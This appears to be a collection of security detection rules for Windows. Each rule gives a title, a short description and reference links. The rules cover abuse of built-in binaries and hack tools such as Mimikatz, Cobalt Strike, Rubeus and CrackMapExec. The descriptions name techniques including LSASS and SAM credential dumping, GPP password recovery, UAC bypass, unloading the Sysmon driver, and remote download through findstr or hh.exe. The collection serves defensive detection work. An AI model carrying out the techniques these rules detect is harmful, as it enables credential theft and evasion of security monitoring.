Copying Sensitive Files with Credential Data Detects the copying of files with well-known filenames (sensitive files with credential data) https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/, https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml
Esentutl Steals Browser Information One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/, https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
Potentially Suspicious Event Viewer Child Process Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
Potentially Suspicious Cabinet File Expansion Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll, https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/
Explorer Process Tree Break Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" https://twitter.com/CyberRaiju/status/1273597319322058752, https://twitter.com/bohops/status/1276357235954909188?s=12, https://twitter.com/nas_bench/status/1535322450858233858, https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. https://ss64.com/nt/shell.html
Explorer NOUACCHECK Flag Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of that newly started explorer.exe to run without any UAC checks https://twitter.com/ORCA6665/status/1496478087244095491
Remote File Download Via Findstr.EXE Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Findstr GPP Passwords Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr
Findstr Launching .lnk File Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/
LSASS Process Reconnaissance Via Findstr.EXE Detects findstr commands that include the keyword lsass, which indicates recon activity for the LSASS process PID https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
Recon Command Output Piped To Findstr.EXE Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" flags, for example. Attackers often use this technique to extract the specific information they require in their reconnaissance phase. https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf, https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html
Permission Misconfiguration Reconnaissance Via Findstr.EXE Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured file or folder permissions. https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Security Tools Keyword Lookup Via Findstr.EXE Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter. https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery, https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf
Insensitive Subfolder Search Via Findstr.EXE Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE Detects usage of "findstr" with the argument "385201", which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service
Finger.EXE Execution Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installations. It displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the age of this utility and the rareness of machines running the finger service, any execution of "finger.exe" can be considered "suspicious" and worth investigating. https://twitter.com/bigmacjpg/status/1349727699863011328?s=12, https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/, http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
Filter Driver Unloaded Via Fltmc.EXE Detects filter driver unloading activity via fltmc.exe https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon, https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom
Sysmon Driver Unloaded Via Fltmc.EXE Detects possible unloading of the Sysmon filter driver via fltmc.exe https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Forfiles.EXE Child Process Masquerading Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/
Forfiles Command Execution Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Forfiles/, https://pentestlab.blog/2020/07/06/indirect-command-execution/
Uncommon FileSystem Load Attempt By Format.com Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. https://twitter.com/0gtweet/status/1477925112561209344, https://twitter.com/wdormann/status/1478011052130459653?s=20
Use of FSharp Interpreters Detects the execution of the FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe". Both can be used for AWL bypass and to execute F# code via scripts or inline. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/
Fsutil Drive Enumeration Attackers may leverage fsutil to enumerate connected drives. Turla has used fsutil fsinfo drives to list connected drives. https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml
Fsutil Behavior Set SymlinkEvaluation A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware, https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior
Fsutil Suspicious Invocation Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during an attack (seen with NotPetya and others). https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md, https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
Potential Arbitrary Command Execution Via FTP.EXE Detects execution of an "ftp.exe" script with the "-s" or "/s" flag and any child processes run by "ftp.exe". https://lolbas-project.github.io/lolbas/Binaries/Ftp/
Arbitrary File Download Via GfxDownloadWrapper.EXE Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file. https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/
Suspicious Git Clone Detects execution of "git" in order to clone a remote repository whose name contains suspicious keywords https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
Potentially Suspicious GoogleUpdate Child Process Detects potentially suspicious child processes of "GoogleUpdate.exe" https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
File Decryption Using Gpg4win Detects usage of Gpg4win to decrypt files https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
File Encryption Using Gpg4win Detects usage of Gpg4win to encrypt files https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
Portable Gpg.EXE Execution Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a, https://securelist.com/locked-out/68960/, https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md
File Encryption/Decryption Via Gpg4win From Suspicious Locations Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
Arbitrary Binary Execution Using GUP Utility Detects execution of the Notepad++ updater (gup) to launch other commands or executables https://twitter.com/nas_bench/status/1535322445439180803
Gpresult Display Group Policy Information Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult, https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/, https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
File Download Using Notepad++ GUP Utility Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. https://twitter.com/nas_bench/status/1535322182863179776
Suspicious GUP Usage Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html
HH.EXE Execution Detects the execution of "hh.exe" to open ".chm" files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md, https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
Remote CHM File Download/Execution Via HH.EXE Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
HTML Help HH.EXE Suspicious Child Process Detects a suspicious child process of a Microsoft HTML Help (HH.exe) https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
Suspicious HH.EXE Execution Detects a suspicious execution of a Microsoft HTML Help (HH.exe) https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
HackTool - ADCSPwn Execution Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service https://github.com/bats3c/ADCSPwn
HackTool - Bloodhound/Sharphound Execution Detects command line parameters used by Bloodhound and Sharphound hack tools https://github.com/BloodHoundAD/BloodHound, https://github.com/BloodHoundAD/SharpHound
HackTool - F-Secure C3 Load by Rundll32 F-Secure C3 produces DLLs with a default exported StartNodeRelay function. https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
HackTool - Certify Execution Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments. https://github.com/GhostPack/Certify
HackTool - Certipy Execution Detects the execution of Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments. https://github.com/ly4k/Certipy, https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
Operator Bloopers Cobalt Strike Commands Detects use of Cobalt Strike commands accidentally entered in the CMD shell https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Operator Bloopers Cobalt Strike Modules Detects Cobalt Strike module/commands accidentally entered in CMD shell https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
CobaltStrike Load by Rundll32 Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line. https://www.cobaltstrike.com/help-windows-executable, https://redcanary.com/threat-detection-report/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
Potential CobaltStrike Process Patterns Detects potential process patterns related to Cobalt Strike beacon activity https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
HackTool - CoercedPotato Execution Detects the use of CoercedPotato, a tool for privilege escalation https://github.com/hackvens/CoercedPotato, https://blog.hackvens.fr/articles/CoercedPotato.html
HackTool - Covenant PowerShell Launcher Detects suspicious command lines used in Covenant launchers https://posts.specterops.io/covenant-v0-5-eee0507b85ba
HackTool - CrackMapExec Execution This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local, https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject
HackTool - CrackMapExec Execution Patterns Detects various execution patterns of the CrackMapExec pentesting framework https://github.com/byt3bl33d3r/CrackMapExec
HackTool - CrackMapExec Process Patterns Detects suspicious process patterns found in logs when CrackMapExec is used https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
HackTool - CrackMapExec PowerShell Obfuscation The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. https://github.com/byt3bl33d3r/CrackMapExec, https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242
HackTool - CreateMiniDump Execution Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
HackTool - DInjector PowerShell Cradle Execution Detects the use of the DInjector PowerShell cradle based on its specific flags https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector
HackTool - Dumpert Process Dumper Execution Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
HackTool - EDRSilencer Execution Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. https://github.com/netero1010/EDRSilencer
HackTool - Empire PowerShell Launch Parameters Detects suspicious powershell command line parameters used in Empire https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
HackTool - Empire PowerShell UAC Bypass Detects some Empire PowerShell UAC bypass methods https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
Hacktool Execution - Imphash Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed Internal Research
HackTool - WinRM Access Via Evil-WinRM Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm, https://github.com/Hackplayers/evil-winrm
Hacktool Execution - PE Metadata Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed https://github.com/cube0x0, https://www.virustotal.com/gui/search/metadata%253ACube0x0/files
HackTool - GMER Rootkit Detector and Remover Execution Detects the execution of the GMER tool based on image and hash fields. http://www.gmer.net/
HackTool - HandleKatz LSASS Dumper Execution Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same https://github.com/codewhitesec/HandleKatz
HackTool - Hashcat Password Cracker Execution Detects execution of Hashcat.exe with a SAM file extracted from the Windows registry and a password list to crack against https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat, https://hashcat.net/wiki/doku.php?id=hashcat
HackTool - Htran/NATBypass Execution Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) https://github.com/HiwinCN/HTran, https://github.com/cw1997/NATBypass
HackTool - Hydra Password Bruteforce Execution Detects command line parameters used by Hydra password guessing hack tool https://github.com/vanhauser-thc/thc-hydra
HackTool - Potential Impacket Lateral Movement Activity Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py, https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
HackTool - Impacket Tools Execution Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries
HackTool - Impersonate Execution Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/, https://github.com/sensepost/impersonate
Invoke-Obfuscation COMPRESS OBFUSCATION Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation CLIP+ Launcher Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
HackTool - Inveigh Execution Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool https://github.com/Kevin-Robertson/Inveigh, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
Invoke-Obfuscation Via Stdin Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
HackTool - Jlaive In-Memory Assembly Execution Detects the use of Jlaive to execute assemblies in a copied PowerShell https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool, https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive
HackTool - Koadic Execution Detects command line parameters used by Koadic hack tool https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/, https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js, https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/
HackTool - KrbRelay Execution Detects the use of KrbRelay, a Kerberos relaying tool https://github.com/cube0x0/KrbRelay
HackTool - KrbRelayUp Execution Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced https://github.com/Dec0ne/KrbRelayUp
HackTool - RemoteKrbRelay Execution Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. https://github.com/CICADA8-Research/RemoteKrbRelay
HackTool - LaZagne Execution Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials. https://github.com/AlessandroZ/LaZagne/tree/master, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/, https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/, https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf
HackTool - LocalPotato Execution Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples https://www.localpotato.com/localpotato_html/LocalPotato.html, https://github.com/decoder-it/LocalPotato
Potential Meterpreter/CobaltStrike Activity Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
HackTool - Mimikatz Execution Detects well-known Mimikatz command line arguments https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://tools.thehacker.recipes/mimikatz/modules
HackTool - PCHunter Execution Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff https://web.archive.org/web/20231210115125/http://www.xuetr.com/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/, https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/
HackTool - Default PowerSploit/Empire Scheduled Task Creation Detects the creation of a schtask via PowerSploit or Empire Default Configuration. https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py
HackTool - PowerTool Execution Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html, https://twitter.com/gbti_sa/status/1249653895900602375?lang=en, https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml
HackTool - Pypykatz Credentials Dumping Activity Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored https://github.com/skelsec/pypykatz, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz
HackTool - PurpleSharp Execution Detects the execution of the PurpleSharp adversary simulation tool https://github.com/mvelazc0/PurpleSharp
HackTool - Quarks PwDump Execution Detects usage of the Quarks PwDump tool via commandline arguments https://github.com/quarkslab/quarkspwdump, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east
HackTool - RedMimicry Winnti Playbook Execution Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility https://redmimicry.com/posts/redmimicry-winnti/
Potential SMB Relay Attack Tool Execution Detects different hacktools used for relay attacks on Windows for privilege escalation https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://pentestlab.blog/2017/04/13/hot-potato/, https://github.com/ohpe/juicy-potato, https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes, https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire, https://www.localpotato.com/
HackTool - Rubeus Execution Detects the execution of the hacktool Rubeus via PE information or command line parameters https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus
HackTool - SafetyKatz Execution Detects the execution of the hacktool SafetyKatz via PE information and default Image name https://github.com/GhostPack/SafetyKatz
HackTool - SecurityXploded Execution Detects the execution of SecurityXploded Tools https://securityxploded.com/, https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
